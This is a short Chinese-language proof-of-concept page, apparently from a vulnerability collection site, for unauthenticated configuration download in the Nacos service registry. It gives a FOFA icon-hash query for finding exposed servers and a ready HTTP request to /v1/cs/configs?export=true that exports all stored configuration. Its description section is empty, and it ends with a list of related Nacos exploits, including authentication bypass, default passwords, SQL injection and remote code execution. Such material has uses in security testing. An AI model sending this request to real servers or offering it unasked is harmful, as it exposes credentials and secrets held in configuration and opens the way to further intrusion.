Nacos未授权下载配置信息

漏洞描述

PoC代码

# Nacos未授权下载配置信息



Nacos未授权下载配置信息



## fofa



```javascript

icon_hash="13942501"

```



## poc



```java

GET /v1/cs/configs?export=true&group=&tenant=&appName=&ids=&dataId= HTTP/1.1

Host: 

```



![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409191401675.png)

相关漏洞推荐

• Nacos /nacos/v1/cs/configs 信息泄露漏洞
• Nacos /nacos/v1/auth/users/login 默认口令漏洞
• nacos-derby-rce: Nacos Derby 远程代码执行 RCE
• nacos-unauthorized-config-download: Nacos 未授权下载配置信息
• nacos-sync-login-bypass: Nacos-Sync 未授权进后台
• Nacos /nacos/v1/auth/users 权限绕过漏洞（CVE-2021-43116）
• POC CVE-2021-29441: Nacos <1.4.1 - Authentication Bypass
• POC CVE-2021-29442: Nacos <1.4.1 - Authentication Bypass
• POC nacos-create-user-unauthorized: Nacos Unauthorized Create User
• POC nacos-authentication-bypass: Nacos < 2.2.0 - Authentication Bypass
• POC nacos-config-server-sql-inject: Naocos Config Server SQL injection
• POC nacos-core-auth-enabled-bypass: Nacos core.auth.enabled 权限绕过
• POC nacos-default-password: Nacos Default Password